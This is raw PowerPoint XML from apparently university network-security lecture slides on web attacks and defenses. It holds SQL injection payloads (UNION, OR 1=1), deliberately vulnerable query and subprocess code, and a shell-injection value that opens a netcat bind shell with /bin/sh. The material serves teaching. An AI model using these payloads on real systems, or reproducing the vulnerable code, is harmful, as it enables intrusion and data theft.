              <a:t>Original query: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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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name, description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items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 smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”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smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(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‘id’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,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‘’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) + “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”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="35A327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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="35A327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 smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Result after injection:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"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name, description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items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'12'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UNION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username, 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users;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--';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 smtClean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Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UPDATE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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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 smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>” +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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(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‘pw’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,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‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>)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smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+ “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’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 smtClean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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(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‘user’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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) +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“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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="77A09F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 smtClean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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Result after injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1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UPDATE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'...'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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'dude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000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OR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1=1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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09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--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';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Similarly to XSS, problem often arises when delimiters are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>unfiltered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ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Original query: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*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$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user_id</a:t>
            </a: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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Result after injection: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*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=1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UNION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... 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--;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Vulnerabilities also arise from improper validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., failing to enforce that numbers are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SQL injection requires knowledge of the schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., knowing which table contains user data, and the structure of that table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind SQL injection leverages information leakage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to recover schemas, execute queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires some observable indicator of query success or failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., a blank page (success/true) vs. an error page (failure/false)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leakage performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bit-by-bit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ability to execute queries and an oracle, extracting information is then a matter of automated requests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"Is the first bit of the first table's name 0 or 1?"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"Is the second bit of the first table's name 0 or 1?"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992795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection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6205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WHERE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2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'{{sanitize($id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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)}}'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trust the database to interpolate user data into queries correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object-relational mappings (ORM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Libraries that abstract away writing SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java – Hibernate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLAlchemy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Django, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLObject</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ruby – Rails, Sequel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Node.js – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sequelize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ORM2, Bookshelf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain-specific languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LINQ (C#), Slick (Scala), </a:t>
            </a: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NoSQL?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databases have fallen out of favor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>versus NoSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>databases like MongoDB and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are NoSQL databases vulnerable to injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>YES.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All untrusted input should always be validated and sanitized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even with ORM and NoSQL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Gateway Interface (CGI)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CGI was the original means of presenting dynamic content to users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side generation of content in response to parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well-defined interface between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP input, scripts, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r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dirty="0"/>
              <a:t>Scripts traditionally reside in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many improved standards exist (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FastCGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, WSGI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often, these CGI scripts invoke other programs using untrusted input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6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Shell Injection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8092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D03CFF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D03CFF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>app.route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'/email'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def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email_message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():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email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req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args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get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'email'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req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args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get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cmd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sendmail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-f {0} contact@blah.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io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format(email)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 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subprocess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Popen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cmd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stdin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subprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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PIPE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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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True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# ...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Shell injection still prevalent on the Web today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442857" y="1607525"/>
            <a:ext cx="6145762" cy="763484"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60371"/>
              <a:gd name="adj2" fmla="val 5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x@x.com y@y.com; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> –l 1337 –e /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>; cat </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57993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9449</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1679</Paragraphs>
  <Slides>163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73" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CS 4740/6740 Network Security</vt:lpstr>
      <vt:lpstr>The Web</vt:lpstr>
      <vt:lpstr>Web Apps are Vulnerable</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>The Web Model</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>HTTP Messages</vt:lpstr>
      <vt:lpstr>HTTP Methods</vt:lpstr>
      <vt:lpstr>HTTP Authentication</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie Example</vt:lpstr>
      <vt:lpstr>Session Cookie Example</vt:lpstr>
      <vt:lpstr>Session Cookies</vt:lpstr>
      <vt:lpstr>Managing State</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>Document Object Model</vt:lpstr>
      <vt:lpstr>JavaScript and the DOM</vt:lpstr>
      <vt:lpstr>Same Origin Policy, Revisited</vt:lpstr>
      <vt:lpstr>Mixing Origins</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>Web Architecture circa-2015</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (XHR)</vt:lpstr>
      <vt:lpstr>XHR Example</vt:lpstr>
      <vt:lpstr>XHR vs. SOP</vt:lpstr>
      <vt:lpstr>Sending Data Over HTTP</vt:lpstr>
      <vt:lpstr>Attacking Web Clients </vt:lpstr>
      <vt:lpstr>Focus on the Client</vt:lpstr>
      <vt:lpstr>Web Threat Model</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Browser Exploits</vt:lpstr>
      <vt:lpstr>Drive-by Install Example</vt:lpstr>
      <vt:lpstr>Exploit Kits</vt:lpstr>
      <vt:lpstr>Revised Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Cookie Exfiltration</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Reflected XSS Attack</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>DOM-based XSS Attack</vt:lpstr>
      <vt:lpstr>Mitigating XSS Attacks</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>Client-side XSS Filters</vt:lpstr>
      <vt:lpstr>Document Integrity</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Output Sanitization</vt:lpstr>
      <vt:lpstr>Challenges of Sanitizing Data</vt:lpstr>
      <vt:lpstr>Response Splitting</vt:lpstr>
      <vt:lpstr>Working Example</vt:lpstr>
      <vt:lpstr>Response Splitting Example</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Vulnerable Website</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CSRF Attack</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Mitigating CSRF Attacks</vt:lpstr>
      <vt:lpstr>HTTP “Referer” Header</vt:lpstr>
      <vt:lpstr>Referer Privacy</vt:lpstr>
      <vt:lpstr>CSRF Tokens</vt:lpstr>
      <vt:lpstr>CSRF Wrapup</vt:lpstr>
      <vt:lpstr>Confused Deputies</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Mitigating Clickjacking</vt:lpstr>
      <vt:lpstr>Anti-Framing</vt:lpstr>
      <vt:lpstr>Attacking Web Servers </vt:lpstr>
      <vt:lpstr>The Story so far…</vt:lpstr>
      <vt:lpstr>Web Architecture circa-2015</vt:lpstr>
      <vt:lpstr>Model-layer Vulnerabilities</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Examples</vt:lpstr>
      <vt:lpstr>SQL Injection Examples</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Defenses</vt:lpstr>
      <vt:lpstr>What About NoSQL?</vt:lpstr>
      <vt:lpstr>Common Gateway Interface (CGI)</vt:lpstr>
      <vt:lpstr>CGI Shell Injection</vt:lpstr>
      <vt:lpstr>Unrestricted Uploads</vt:lpstr>
      <vt:lpstr>PHP</vt:lpstr>
      <vt:lpstr>register_globals</vt:lpstr>
      <vt:lpstr>magic_quotes</vt:lpstr>
      <vt:lpstr>magic_quotes</vt:lpstr>
      <vt:lpstr>HTML5</vt:lpstr>
      <vt:lpstr>The Story So Far…</vt:lpstr>
      <vt:lpstr>HTML5</vt:lpstr>
      <vt:lpstr>SOP in Turmoil</vt:lpstr>
      <vt:lpstr>XSS Attacks, Revisited</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>CSP Header </vt:lpstr>
      <vt:lpstr>CSP Directives</vt:lpstr>
      <vt:lpstr>CSP Origins</vt:lpstr>
      <vt:lpstr>XSS Attacks, Revisited</vt:lpstr>
      <vt:lpstr>Inline Scripts Considered Harmful</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Attacks, Round 4</vt:lpstr>
      <vt:lpstr>CSP Keywords</vt:lpstr>
      <vt:lpstr>CSP Actions</vt:lpstr>
      <vt:lpstr>Actual CSP Example</vt:lpstr>
      <vt:lpstr>CSP Discussion</vt:lpstr>
      <vt:lpstr>Framing Third-Party Content</vt:lpstr>
      <vt:lpstr>HTML5 Sandbox</vt:lpstr>
      <vt:lpstr>Sandbox Examples</vt:lpstr>
      <vt:lpstr>Sandbox Caveats</vt:lpstr>
      <vt:lpstr>SOP in Turmoil</vt:lpstr>
      <vt:lpstr>Cross-Frame Messaging</vt:lpstr>
      <vt:lpstr>Frame Hierarchy</vt:lpstr>
      <vt:lpstr>document.domain</vt:lpstr>
      <vt:lpstr>When document.domain Fails</vt:lpstr>
      <vt:lpstr>Fragment Identifiers</vt:lpstr>
      <vt:lpstr>Communicating Via Fragment Identifiers</vt:lpstr>
      <vt:lpstr>postMessage</vt:lpstr>
      <vt:lpstr>postMessage Example</vt:lpstr>
      <vt:lpstr>postMessage Broadcast</vt:lpstr>
      <vt:lpstr>postMessage Security</vt:lpstr>
      <vt:lpstr>SOP Relaxation</vt:lpstr>
      <vt:lpstr>Server-side Aggregation</vt:lpstr>
      <vt:lpstr>Server-side Aggregation Example</vt:lpstr>
      <vt:lpstr>JSONP</vt:lpstr>
      <vt:lpstr>JSONP Example</vt:lpstr>
      <vt:lpstr>JSONP Example</vt:lpstr>
      <vt:lpstr>JSONP Vulnerabilities</vt:lpstr>
      <vt:lpstr>Cross-origin Resource Sharing (CORS)</vt:lpstr>
      <vt:lpstr>Simple Request Example</vt:lpstr>
      <vt:lpstr>Preflight Request</vt:lpstr>
      <vt:lpstr>Origin Header</vt:lpstr>
      <vt:lpstr>CORS Discussion</vt:lpstr>
      <vt:lpstr>Browser Architecture</vt:lpstr>
      <vt:lpstr>Browser Architecture, Revisited</vt:lpstr>
      <vt:lpstr>Monolithic Browsers</vt:lpstr>
      <vt:lpstr>Browser Separation</vt:lpstr>
      <vt:lpstr>Chrome Architecture Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Browser Separation Discussion</vt:lpstr>
      <vt:lpstr>Extensions</vt:lpstr>
      <vt:lpstr>Chrome Extension Architecture</vt:lpstr>
      <vt:lpstr>Chrome Extension APIs</vt:lpstr>
      <vt:lpstr>Chrome Extension Example</vt:lpstr>
      <vt:lpstr>Extension Permissions</vt:lpstr>
      <vt:lpstr>Malicious Extensions</vt:lpstr>
      <vt:lpstr>Open Research Problem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1066</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-18T16:53:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-31T20:18:49Z</dcterms:modified>
</cp:coreProperties>
</file>